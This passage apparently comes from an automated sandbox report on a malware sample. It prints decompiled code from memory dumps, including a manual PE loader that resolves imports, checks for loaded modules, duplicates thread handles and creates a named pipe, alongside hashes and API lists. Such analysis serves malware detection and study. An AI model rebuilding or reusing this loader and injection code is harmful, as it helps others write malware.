				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x1001e688; // 0x7900590
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
					E1000A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E1000A471( &_v556, _t298);
					 *0x1001e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
						 *_t337 = 0x610;
						_t124 = E100095E1(0x1001b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x1001e688; // 0x7900590
						_t127 = E100092E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E100085D5( &_v612);
						_t130 = E1000B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E1000861A( &_v616, 0xfffffffe);
						_t133 =  *0x1001e688; // 0x7900590
						_t22 = _t133 + 0x114; // 0x79006a4
						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x1001e688; // 0x7900590
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x1001e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E1000E2C6(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x1001e6b4; // 0x797fc48
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E1000E2C6(_t353,  &_v588);
								_t235 =  *0x1001e6b4; // 0x797fc48
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x1001e73c;
							if( *0x1001e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x1001e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x1001e688; // 0x7900590
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E100049A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x1001e684; // 0x797faa0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x1001e688; // 0x7900590
											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E10008604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E1000109A(_t262, 0x148);
													_t305 =  *0x1001e688; // 0x7900590
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E1000902D(_t271,  &_v572);
													_t272 =  *0x1001e688; // 0x7900590
													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x1001e688; // 0x7900590
														__eflags = _t200 + 0x1020;
														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E100085D5( &_v636);
														E1000A911(_t333, 0, 0xbb8, 1);
														E1000861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E1000861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E100049A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x1001e684; // 0x797faa0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E10008604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E100095E1(_t278, 0x32d);
										_t280 =  *0x1001e688; // 0x7900590
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E100085D5( &_v636);
										E1000A911(_t249, 0, 0xbb8, 1);
										E1000861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E100095E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x1001e688; // 0x7900590
								_t329 = E100092E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E1000B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x1001e684; // 0x797faa0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E1000861A( &_v612, 0xfffffffe);
								}
								E100085D5( &_v616);
								_t150 =  *0x1001e688; // 0x7900590
								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
								_t153 =  *0x1001e688; // 0x7900590
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x1001e738, 0x105);
								_t331 =  *0x1001e688; // 0x7900590
								_t117 = _t331 + 0x228; // 0x79007b8
								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
								E1000861A(0x1001e740, 0xfffffffe);
								E1000861A(0x1001e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E100095C7(0x6e2);
				_v616 = _t250;
				_t326 = E100095C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E100085C2( &_v616);
					_t122 = E100085C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
lstrcpynW.KERNEL32(07900158,00000105), ref: 1000526F
lstrcpynW.KERNEL32(07900368,00000105), ref: 10005283

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleModulelstrcpyn
String ID:
API String ID: 3430401031-0
Opcode ID: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
Opcode Fuzzy Hash: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52

Uniqueness

Uniqueness Score: -1.00%

Function 10012AEC, Relevance: 6.2, APIs: 4, Instructions: 219
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}

APIs

GetModuleHandleA.KERNEL32(?), ref: 10012C4C
LoadLibraryA.KERNEL32(?), ref: 10012C65
GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64

Uniqueness

Uniqueness Score: -1.00%

Function 10001C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x1001e6dc; // 0x0
				_t13 = E1000A4BF(_t41, 0);
				while(_t13 < 0) {
					E1000980C( &_v28);
					_t43 =  *0x1001e6e0; // 0x0
					_t15 =  *0x1001e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x1001e684; // 0x797faa0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x1001e684; // 0x797faa0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x1001e6dc; // 0x0
						__eflags = 0;
						_t13 = E1000A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x1001e6e8; // 0x0
				_v28 = _t20;
				_t22 = E1000A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
					E1000980C(0x1001e6e0);
					_t64 = E10001A1B( &_v28, E10001226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x1001e760);
						_t51 = 0x27;
						E10009F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x1001e684; // 0x797faa0
				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
				_t48 =  *0x1001e6dc; // 0x0
				 *0x1001e6d0 = 0;
				E1000A4DB(_t48);
				E1000861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
Instruction ID: 912c1b93fe30e14ebce55579952f4eddc1cb52f7c5d97e94b218bb2c615be3ff
Opcode Fuzzy Hash: 51b5adafcade1612d18be566dc9ac30724e52013d4e81271525bc6ddc3b1320c
Instruction Fuzzy Hash: C831C036604264AFF344DFA4DCC5C6E77A9FB983D0B904A2AF941C32A5DA30ED048B52

Uniqueness

Uniqueness Score: -1.00%

Function 10001B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10001B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x1001e6f4; // 0x0
				_t12 = E1000A4BF(_t38, 0);
				while(_t12 < 0) {
					E1000980C( &_v28);
					_t40 =  *0x1001e700; // 0x0
					_t14 =  *0x1001e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x1001e684; // 0x797faa0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x1001e684; // 0x797faa0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x1001e6f4; // 0x0
								__eflags = 0;
								_t12 = E1000A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E1000980C(0x1001e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x1001e6e8; // 0x0
				_v28 = _t24;
				_t61 = E10001A1B( &_v28, E1000131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x1001e760);
					_t48 = 0x27;
					E10009F06(_t48);
				}
				if(_v24 != 0) {
					E10006890( &_v24);
				}
				_t26 =  *0x1001e684; // 0x797faa0
				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
				_t28 =  *0x1001e758; // 0x0
				 *0x1001e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x1001e6f4; // 0x0
				 *0x1001e758 =  !=  ? 1 : _t28;
				E1000A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}

APIs

GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BCC
GetCurrentThread.KERNEL32(00000000), ref: 10001BCF
GetCurrentProcess.KERNEL32(00000000), ref: 10001BD6
DuplicateHandle.KERNEL32 ref: 10001BD9

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
Instruction ID: 6a0302f5f4fd7db6b8bd225124d86af098f07b21623db759acfbad22203cc7cf
Opcode Fuzzy Hash: 7d4547abbc7cd73308a72d50dfc35b1c5cccec9524bb0b2978a9a99cc3da80e6
Instruction Fuzzy Hash: 50319C756083A19FF744DF64CCD886E77A9EB983D0B418968F601872A6DB30EC44CB52

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 3068 Parent PID: 2912 explorer.exeCOMMON

Executed Functions

Function 00085A61, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00085A61(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0x9e684; // 0x12af8f0
				 *((intOrPtr*)(_t2 + 0x108))(1, E00085A06);
				E00085631(_t6, _t7); // executed
				return 0;
			}

0x00085a61
0x00085a6d
0x00085a73
0x00085a7a

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,00085A06,00085CE8), ref: 00085A6D

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
Instruction ID: 435aaf7462d5f916828f25a0b113b0bfc22426b62e8c3a1df64e723560edf676
Opcode Fuzzy Hash: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
Instruction Fuzzy Hash: 2FB092312509409BD640FB60CC8AEC83290BB20782F4100A072858A0A3DAE048906702

Uniqueness

Uniqueness Score: -1.00%

Function 00084A0B, Relevance: 10.8, APIs: 7, Instructions: 285
stringpipeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				CHAR* _v1112;
				char _v1116;
				void* __esi;
				intOrPtr _t66;
				CHAR* _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				CHAR* _t106;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x9e688; // 0xf0000
					_t125 =  *0x9e68c; // 0x12afab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E0008BB8D(_t187) != 0) {
					L4:
					_t134 = _t128; // executed
					_t66 = E0008B7A8(_t134,  &_v516); // executed
					_push(_t134);
					_v1104 = _t66;
					E0008B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
					E0008B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208); // executed
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000892E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x9e688; // 0xf0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000891E3(_v1112);
								_t145 = _t130;
								 *0x9e740 = _t76;
								 *0x9e738 = E000891E3(_t145);
								L17:
								_push(_t145);
								_t80 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
								_t188 = _t80;
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x9b9ca);
								E00089F48(0xe); // executed
								E00089F6C(_t188, _t208, _t130); // executed
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb; // executed
								E0008A0AB(_t188, _t178, _t208); // executed
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E0008A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E0008A3ED(_t188, _t180, _t208); // executed
								}
								_t87 = E0008980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2; // executed
								_t89 = E0008A0AB(_t153, _t181, _t208); // executed
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x9e688; // 0xf0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x9e688; // 0xf0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E0008E23E(_t183);
										}
										E000852C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x9e688; // 0xf0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E0008109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000885D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xf0228
									_t153 = _t51;
									L25:
									_t90 = E0008553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x9e688; // 0xf0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E0008C292(_v1104, __eflags);
							_v1112 = _t106;
							_t108 = CreateNamedPipeA(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x9e684; // 0x12af8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E0008861A( &_v1116, _t192);
								_t145 = _t108;
								goto L17;
							}
